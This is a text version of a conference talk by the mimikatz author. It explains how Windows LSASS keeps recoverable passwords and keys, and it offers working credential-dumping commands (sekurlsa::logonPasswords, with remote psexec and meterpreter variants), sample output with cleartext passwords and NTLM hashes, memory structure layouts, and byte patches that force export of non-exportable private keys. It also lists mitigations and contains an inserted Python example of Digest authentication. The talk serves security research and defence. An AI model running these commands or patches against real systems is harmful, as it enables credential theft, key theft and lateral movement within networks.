tspkg            tspkg!TSGlobalCredTable                  RTL_AVL_TABLE
wdigest          wdigest!l_LogSessList                    LIST_ENTRY
livessp          livessp!LiveGlobalLogonSessionList       LIST_ENTRY
kerberos (nt5)   kerberos!KerbLogonSessionList            LIST_ENTRY
kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable     RTL_AVL_TABLE
msv1_0           lsasrv!LogonSessionList                  LIST_ENTRY
                 lsasrv!LogonSessionListCount             ULONG

Protection Keys
Key     NT 5 Symbols
RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx    lsasrv!g_pDESXKey, lsasrv!g_Feedback

Key     NT 6 Symbols
        lsasrv!InitializationVector
3DES    lsasrv!h3DesKey
AES     lsasrv!hAesKey
mimikatz :: sekurlsa :: memo
Some commands:
mimikatz privilege::debug sekurlsa::logonPasswords full exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
    msv1_0 :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
     * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
    kerberos :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Mot de passe : waza1234
    wdigest :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Mot de passe : waza1234
    tspkg :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Mot de passe : waza1234
    livessp :
     * n.t. (LUID KO)
mimikatz :: sekurlsa :: what we can do?
Basics:
- No physical access to computer (first step to pass the hash, then pass the pass)
- No admin rights / system rights / debug privileges (...)
- Disable local admin accounts
- Strong passwords (haha, it was a joke, so useless ;))
- For privileged account: network login instead of interactive (when possible)
- Audit: pass the hash keeps traces and can lock accounts
- No admin rights / system rights / debug privileges, even VIP
- Use separated network (or forest) for privileged tasks
More in depth:
- Force strong authentication (SmartCard & Token) $ / €
- Short validity for Kerberos tickets
- No delegation
- Disable NTLM (available with NT6)
- No exotic:
  * biometrics (it keeps password somewhere and pushes it to Windows)
  * single sign on
- Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
- Let opportunities to stop retro compatibility
- Disable faulty providers:
  * Is it supported by Microsoft?
  * Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto :: what is it?
A little module that I wrote to:
- play with Windows Cryptographic API, CNG and RSA keys
- automate export of certificates/keys
  * Even those which are "not" exportable
What crypto module can do:
- List
  * Providers
  * Stores
  * Certificates
  * Keys
- Export
  * Certificates
    - public in DER format
    - with private keys in PFX format
  * Private keys in PVK format
    - it's cool, OpenSSL can deal with it too
- Patch
  * CryptoAPI in mimikatz context
  * CNG in LSASS context (again ;))
[figure: mod_mimikatz_crypto]
mimikatz :: crypto :: how it's protected
Private keys are DPAPI protected
- You cannot reuse private key files on another computer
  * At least without the master keys and/or password of users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
- Yes, a computer/server opens a "session"
Export/Usage can be limited by:
- Password
- Popup
  (Password and Popup: constraint for most users; unavailable for computer keys)
- Export/Archive flag not present
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi :: how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." - http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, yourappshere...) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, ...
- cryptdll.dll, rsaenh.dll, ...
Processes deal with cryptographic keys through this API...
mimikatz :: crypto :: capi :: how it's exported ( level)
[diagram] Process asks to export key -> CryptoAPI and RSA CSP: load private key (DPAPI decode) -> Exportable? yes -> exported key; no -> NTE_BAD_KEY_STATE (PLAYSKOOL)
mimikatz :: crypto :: patchcapi :: because I own my process
When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey.
This function does all the work to prepare the export and checks if the key is exportable.

mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
    - Benjamin Delpy
        Container Clé : 470ADFBA-8718-4014-B05E-B30776B75A03
        Provider      : Microsoft Enhanced Cryptographic Provider v1.0
        Type          : AT_KEYEXCHANGE
        Exportabilité : NON
        Taille clé    : 2048
        Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
        Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
(Exportable? check)
mimikatz :: crypto :: patchcapi :: because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space:
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi :: demo time
Import, export, import as not exportable... export
mimikatz :: crypto :: patchcapi :: limitations
Because:
- I'm lazy
- I've seen in the majority of cases RSA keys for real life use
  * Elliptic Curve, a little...
mimikatz crypto::patchcapi only deals with:
- Microsoft Base Cryptographic Provider v1.0
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced RSA and AES Cryptographic Provider
- Microsoft RSA SChannel Cryptographic Provider
- Microsoft Strong Cryptographic Provider
...all based on rsaenh.dll
mimikatz :: crypto :: cng :: how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." - http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context.
Processes use RPC to call "Key isolation service" (keyiso) functions.
It seems more secure than CryptoAPI...
- It is, but it's not perfect...
mimikatz :: crypto :: cng :: how it's exported ( level)
[diagram] Process (CNG) asks to export key -> RPC -> KeyIso Service (LSASS Process): load private key (DPAPI decode) -> Exportable? yes -> exported key; no -> NTE_NOT_SUPPORTED (PLAYSKOOL)
NT6: System protected process, ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP / SYSTEM_MANDATORY_LABEL_NO_READ_UP
mimikatz :: crypto :: patchcng - because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso): ncrypt!SPCryptExportKey
This function does all the work to prepare the export and checks if the key is exportable.

    mimikatz # crypto::exportKeys
    [user]
    Clés CNG :
     - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportabilité : NON
        Taille clé : 2048
        Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
        mod_cryptong::getPrivateKey ; PrivateKeyBlobToPVK (0x80090029) : L'opération demandée n'est pas prise en charge.
mimikatz :: crypto :: patchcng - because sometimes I own LSASS
This time checks and keys are in the LSASS process... And what?
I wrote "1" byte in LSASS memory space...

    .text:6C815210 75 1C    jnz short continue_key_export
    .text:6C815210 EB 1C    jmp short continue_key_export
mimikatz :: crypto :: patchcng - demo time
Import, export, import as not exportable... export again!
mimikatz :: crypto :: patchcng - limitations
Patch operation needs some privileges
- Admin (debug privilege)
- SYSTEM
mimikatz crypto::patchcng only deals with
- Microsoft Software Key Storage Provider (maybe other algs than RSA?)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates... even those that are exportable (hu?)
- certutil can...
mimikatz :: crypto :: patchcng - bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
- until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for an export can work too
- Yeah, like the good old certutil

    C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
    MY
    ================ Certificat 1 ================
    […]
    Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
      Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
      Fournisseur = Microsoft Software Key Storage Provider
    La clé privée NE PEUT PAS être exportée
    Succès du test de chiffrement
    CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
    CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

    C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
    MY
    ================ Certificat 1 ================
    […]
    Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
      Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
      Fournisseur = Microsoft Software Key Storage Provider
    Succès du test de chiffrement
    CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto :: memo
Some commands:

    mimikatz crypto::patchcapi crypto::exportCertificates exit

    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit

    mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"

    mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password
- PFX files are protected by this password: mimikatz
Keys
- When you import a certificate multiple times (exportable or not), Windows makes duplicate keys
- When you delete a certificate, Windows does not delete its private key... funny, isn't it?
  * So yes, mimikatz can export it
mimikatz :: crypto :: what we can do?
Exactly the same as for sekurlsa: prevent access to accounts/computer
- no admin, no admin, no admin...
Basics
- Use smartcards/tokens for users' certificates
- Use Hardware Security Modules (HSM), even SoftHSM
More in depth
- See what Microsoft can do with TPM from Windows 8
  * Virtual SmartCard seems promising
- Verify vendors' implementations (Lenovo, Dell, ...) of TPM CSP/KSP
  * Their biometrics stuff was a little buggy ;)
mimikatz :: what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
- Play with tokens & privileges
- Display SSDT x86 & x64
- List minifilters actions
- List Notifications (process, thread, image, registry)
- List Objects hooks and procedures
- ...
...
mimikatz :: that's all folks!
Thanks to / Merci à
- my girlfriend for her support (her LSASS crashed a few times)
- Application Security Forum for offering me this great opportunity
  * Partners and Sponsors, for sure
- Microsoft, for always considering it as normal/acceptable
- Security friends/community for their ideas & challenges
  * nagual, newsoft, mubix, ...
- You, for your attention
Questions?
Don't be shy ;)
... especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: tspkg - questions
KB says that for it to work, we must enable « Default credentials » delegation
- "Default credentials: The credentials obtained when the user first logs on to Windows" - https://msdn.microsoft.com/library/bb204773.aspx
  * What? Our User/Domain/Password | Hash | Ticket? It seems...
- In all cases the system seems to be vulnerable to pass-the-...
In what form? Our specs: [MS-CSSP]
- 2.2.1.2.1 TSPasswordCreds
  * "The TSPasswordCreds structure contains the user's password credentials that are delegated to the server" (or PIN)

    TSPasswordCreds ::= SEQUENCE {
        domainName [0] OCTET STRING,
        userName   [1] OCTET STRING,
        password   [2] OCTET STRING
    }

- Challenge response for authentication?
  * Server: YES (TLS, Kerberos)
  * Client: NO, password is sent to server...
So the password resides somewhere in memory!
mimikatz :: sekurlsa :: tspkg - symbols & theory
Let's explore some symbols
- sounds cool... (thanks Microsoft)
Let's imagine a scenario
- Enumerate all sessions to obtain
  * Username
  * Domain
  * LUID
- Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain
  * TS_CREDENTIAL
- Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
  * TS_PRIMARY_CREDENTIAL with clear text credentials...

    kd> x tspkg!*clear*
    75016d1c  tspkg!TSObtainClearCreds = <no type information>
    kd> x tspkg!*password*
    75011b68  tspkg!TSDuplicatePassword = <no type information>
    75011cd4  tspkg!TSHidePassword = <no type information>
    750195ee  tspkg!TSRevealPassword = <no type information>
    75012fbd  tspkg!TSUpdateCredentialsPassword = <no type information>
    kd> x tspkg!*locate*
    7501158b  tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz :: sekurlsa :: tspkg - workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl on tspkg!TSGlobalCredTable → KIWI_TS_CREDENTIAL → pTsPrimary → KIWI_TS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

    typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
        PVOID unk0;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Password;
    } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

    typedef struct _KIWI_TS_CREDENTIAL {
    #ifdef _M_X64
        BYTE unk0[108];
    #elif defined _M_IX86
        BYTE unk0[64];
    #endif
        LUID LocallyUniqueIdentifier;
        PVOID unk1;
        PVOID unk2;
        PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
    } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz :: sekurlsa :: tspkg - demo time
sekurlsa::tspkg
mimikatz :: sekurlsa :: wdigest
because clear text password over http/https is not cool
mimikatz :: sekurlsa :: wdigest - what is it?
"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network […]" - Wikipedia, http://en.wikipedia.org/wiki/Digest_access_authentication
"Common Digest Authentication Scenarios
- Authenticated client access to a Web site
- Authenticated client access using SASL
- Authenticated client access with integrity protection to a directory service using LDAP" - Microsoft, http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool
- No password over the network, just hashes
- No reversible password in Active Directory, hashes for each realm
  * Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest - what is it?
We speak about hashes, but what hashes?
H = MD5(HA1:nonce:[…]:HA2)
  * HA1 = MD5(username:realm:password)
  * HA2 = MD5(method:digestURI[…])
Even after login, HA1 may change... the realm is from the server side and cannot be determined before Windows logon!
WDigest provider must have the elements to compute responses for different servers
- Username
- Realm (from server)
- Password
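The computation on the slide, worked through as an added example (not code from the talk or from mimikatz). It follows RFC 2617 with qop=auth and uses the RFC's own test vector (user Mufasa, realm testrealm@host.com, password "Circle Of Life"); the second realm "mail.example" and the HA1 cache are constructed for the demonstration. It shows the constraint the slide describes: HA1 is bound to the realm the server announces, so a client that keeps only HA1 values computed at logon can answer the realms it already knows and nothing else, while a client that keeps the password can answer any realm. The server side only ever needs its own realm's HA1, which is what Advanced Digest's per-realm hashes give the directory.

```python
# Added example: RFC 2617 Digest (qop=auth) computations behind the slide's
# H = MD5(HA1:nonce:...:HA2), HA1 = MD5(username:realm:password), HA2 = MD5(method:uri).
# Not from the talk or mimikatz. The realm "mail.example" and the HA1 cache are constructed.
import hashlib
import hmac
from typing import Dict, Optional


def _md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def digest_ha1(username: str, realm: str, password: str) -> str:
    """HA1 depends on the realm, and the realm is chosen by the server."""
    return _md5_hex(f"{username}:{realm}:{password}")


def digest_ha2(method: str, uri: str) -> str:
    return _md5_hex(f"{method}:{uri}")


def digest_response(ha1: str, nonce: str, nc: str, cnonce: str, ha2: str) -> str:
    """qop=auth response: MD5(HA1:nonce:nc:cnonce:qop:HA2)."""
    return _md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:auth:{ha2}")


def respond_with_password(username: str, password: str, realm: str, nonce: str,
                          method: str, uri: str, cnonce: str, nc: str = "00000001") -> str:
    """Client that kept the password: can derive HA1 for whatever realm the server sends."""
    ha1 = digest_ha1(username, realm, password)
    return digest_response(ha1, nonce, nc, cnonce, digest_ha2(method, uri))


def respond_with_ha1_cache(ha1_by_realm: Dict[str, str], realm: str, nonce: str,
                           method: str, uri: str, cnonce: str, nc: str = "00000001") -> Optional[str]:
    """Client that kept only HA1 values: an unknown realm cannot be answered without the password."""
    ha1 = ha1_by_realm.get(realm)
    if ha1 is None:
        return None
    return digest_response(ha1, nonce, nc, cnonce, digest_ha2(method, uri))


def server_verify(stored_ha1: str, nonce: str, nc: str, cnonce: str,
                  method: str, uri: str, response: str) -> bool:
    """Server side needs only its own realm's HA1, never the password itself."""
    expected = digest_response(stored_ha1, nonce, nc, cnonce, digest_ha2(method, uri))
    return hmac.compare_digest(expected, response)


if __name__ == "__main__":
    nonce = "dcd98b7102dd2f0e8b11d0f600bfb0c093"        # nonce from the RFC 2617 example
    ha1_cache = {"testrealm@host.com": digest_ha1("Mufasa", "testrealm@host.com", "Circle Of Life")}
    for realm in ("testrealm@host.com", "mail.example"):  # second realm is constructed
        print(realm,
              respond_with_ha1_cache(ha1_cache, realm, nonce, "GET", "/dir/index.html", "0a4f113b"),
              respond_with_password("Mufasa", "Circle Of Life", realm, nonce, "GET", "/dir/index.html", "0a4f113b"))
```

Running it prints a valid response for both realms from the password-holding client, and None for mail.example from the HA1-only client: that gap is exactly why WDigest has to keep the password rather than a precomputed hash.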
mimikatz :: sekurlsa :: wdigest - theory
This time we know
- that WDigest keeps the password in memory « by protocol » for the HA1 digest
- that LSASS loves to unprotect passwords with LsaUnprotectMemory (so they are protected with LsaProtectMemory)
LsaUnprotectMemory
- At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
- Let's perform a search in WDigest
- Hypothesis seems verified
LsaProtectMemory
- At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
- Let's perform a search in WDigest
- SpAcceptCredentials takes the clear password in its args
  * Protects it with LsaProtectMemory
  * Updates or inserts data in the doubly linked list wdigest!l_LogSessList

    .text:7409D151 _DigestCalcHA1@8          call dword ptr [eax+0B4h]
    .text:74096C69 _SpAcceptCredentials@16   call dword ptr [eax+0B0h]
mimikatz :: sekurlsa :: wdigest - workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list wdigest!l_LogSessList for the LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory → password in clear]

    typedef struct _KIWI_WDIGEST_LIST_ENTRY {
        struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
        struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
        DWORD UsageCount;
        struct _KIWI_WDIGEST_LIST_ENTRY *This;
        LUID LocallyUniqueIdentifier;
        […]
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
        […]
    } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest - demo time
sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp - how?
Actually, I've only used a logical (empirical) approach to search for passwords...
- Protocol reading
- Symbols searching
~ Boring ~ ... be more brutal this time: make a WinDBG trap!

    0: kd> !process 0 0 lsass.exe
    PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
        DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
        Image: lsass.exe
    0: kd> .process /i 83569040
    You need to continue execution (press 'g' <enter>) for the context
    to be switched. When the debugger breaks in again, you will be in
    the new process context.
    0: kd> g
    Break instruction exception - code 80000003 (first chance)
    nt!RtlpBreakWithStatusInstruction:
    814b39d0 cc              int     3
    0: kd> .reload /user
    Loading User Symbols
    0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
    0: kd> g
mimikatz :: sekurlsa :: livessp - how?
Let's login with a Live account on Windows 8
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)

    lsasrv!LsaProtectMemory
    livessp!LiveMakeSupplementalCred
    livessp!LiveMakeSecPkgCredentials
    livessp!LsaApLogonUserEx2
    livessp!SpiLogonUserEx2            <- Our LiveSSP provider

    lsasrv!LsaProtectMemory
    msv1_0!NlpAddPrimaryCredential
    msv1_0!SspAcceptCredentials
    msv1_0!SpAcceptCredentials         <- Yeah! Pass the Hash capability with Live account too...

    lsasrv!LsaProtectMemory
    tspkg!TSHidePassword
    tspkg!SpAcceptCredentials          <- Live user can logon through RDP via SSO

    1: kd> uf /c livessp!LsaApLogonUserEx2
    livessp!LsaApLogonUserEx2 (74781536)
      […]
      livessp!LsaApLogonUserEx2+0x560 (74781a96):
        call to livessp!LiveCreateLogonSession (74784867)
mimikatz :: sekurlsa :: livessp - workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list livessp!LiveGlobalLogonSessionList for the LUID → KIWI_LIVESSP_LIST_ENTRY → suppCreds → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

    typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
        DWORD isSupp;
        DWORD unk0;
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

    typedef struct _KIWI_LIVESSP_LIST_ENTRY {
        struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
        struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
        PVOID unk0;
        PVOID unk1;
        PVOID unk2;
        PVOID unk3;
        DWORD unk4;
        DWORD unk5;
        PVOID unk6;
        LUID LocallyUniqueIdentifier;
        LSA_UNICODE_STRING UserName;
        PVOID unk7;
        PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
    } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz :: sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me: yes!
mimikatz :: sekurlsa :: kerberos
Let's login with a normal account
After credentials protection, KerbCreateLogonSession calls
- NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
- NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList

    lsasrv!LsaProtectMemory
    kerberos!KerbHideKey
    kerberos!KerbCreatePrimaryCredentials
    kerberos!KerbCreateLogonSession
    kerberos!SpAcceptCredentials        <- Kerberos ticket part? Maybe ;)

    lsasrv!LsaProtectMemory
    kerberos!KerbHidePassword
    kerberos!KerbCreateLogonSession
    kerberos!SpAcceptCredentials        <- Kerberos part for password

    lsasrv!LsaProtectMemory
    msv1_0!NlpAddPrimaryCredential
    msv1_0!SspAcceptCredentials
    msv1_0!SpAcceptCredentials

    lsasrv!LsaProtectMemory
    wdigest!SpAcceptCredentials

    lsasrv!LsaProtectMemory
    tspkg!TSHidePassword
    tspkg!SpAcceptCredentials
mimikatz :: sekurlsa :: kerberos (nt6) - workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl on kerberos!KerbGlobalLogonSessionTable → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

    typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
        DWORD unk0;
        PVOID unk1;
        PVOID unk2;
        PVOID unk3;
    #ifdef _M_X64
        BYTE unk4[32];
    #elif defined _M_IX86
        BYTE unk4[20];
    #endif
        LUID LocallyUniqueIdentifier;
    #ifdef _M_X64
        BYTE unk5[44];
    #elif defined _M_IX86
        BYTE unk5[36];
    #endif
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) - workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list kerberos!KerbLogonSessionList for the LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear]

    typedef struct _KIWI_KERBEROS_LOGON_SESSION {
        struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
        struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
        DWORD UsageCount;
        PVOID unk0;
        PVOID unk1;
        PVOID unk2;
        DWORD unk3;
        DWORD unk4;
        PVOID unk5;
        PVOID unk6;
        PVOID unk7;
        LUID LocallyUniqueIdentifier;
    #ifdef _M_IX86
        DWORD unk8;
    #endif
        DWORD unk9;
        DWORD unk10;
        PVOID unk11;
        DWORD unk12;
        DWORD unk13;
        PVOID unk14;
        PVOID unk15;
        PVOID unk16;
        […]
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa - demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos - "hu?"
Ok. It works...
But why?
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations:
- no need of passwords for the Kerberos protocol...
- all is based on the hash (not very sexy too)
Microsoft's implementation of Kerberos is full of logical...
- For password auth
  * password hash for shared secret, but keeping the password in memory
- For full smartcard auth
  * No password on client
  * No hash on client
- NTLM hash on client...
- KDC sent it back, as a gift!
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way, to be usable
We used LsaUnprotectMemory in the LSASS context to decrypt them
- This function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) in the LSASS process to take benefit of its keys when we called it
Can it be fun to decrypt outside the process?
- Yes it is... no more injection, just reading the memory of the LSASS process...
mimikatz can use lsasrv.dll too and "imports" the keys initialized by LSASS
- When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS
mimikatz :: sekurlsa :: LsaEncryptMemory - NT5
Depending on the size of the secret, LsaEncryptMemory uses
- RC4
- DESx
[Diagram: key material held by lsasrv inside lsass, copied into mimikatz: g_cbRandomKey (DWORD, 256), g_pRandomKey (BYTE[g_cbRandomKey]), g_pDESXKey (BYTE[144]), g_Feedback (BYTE[8])]
mimikatz :: sekurlsa :: LsaEncryptMemory NT6

Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES
NT6 key material in lsasrv (diagram):
  InitializationVector : BYTE[16]
  h3DesKey             : handle to a KIWI_BCRYPT_KEY
  hAesKey              : handle to a KIWI_BCRYPT_KEY
(Diagram: lsass/lsasrv holds the IV and the two BCrypt key handles; mimikatz copies them, and the key data they point to, into its own process… )

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE  data;   /* etc. (raw key material follows) */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;   /* "cle" = key: pointer to the key data above */
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa :: memo

Security Packages

  Package          | Symbols                                                  | Type
  -----------------|----------------------------------------------------------|-------------------
  tspkg            | tspkg!TSGlobalCredTable                                  | RTL_AVL_TABLE
  wdigest          | wdigest!l_LogSessList                                    | LIST_ENTRY
  livessp          | livessp!LiveGlobalLogonSessionList                       | LIST_ENTRY
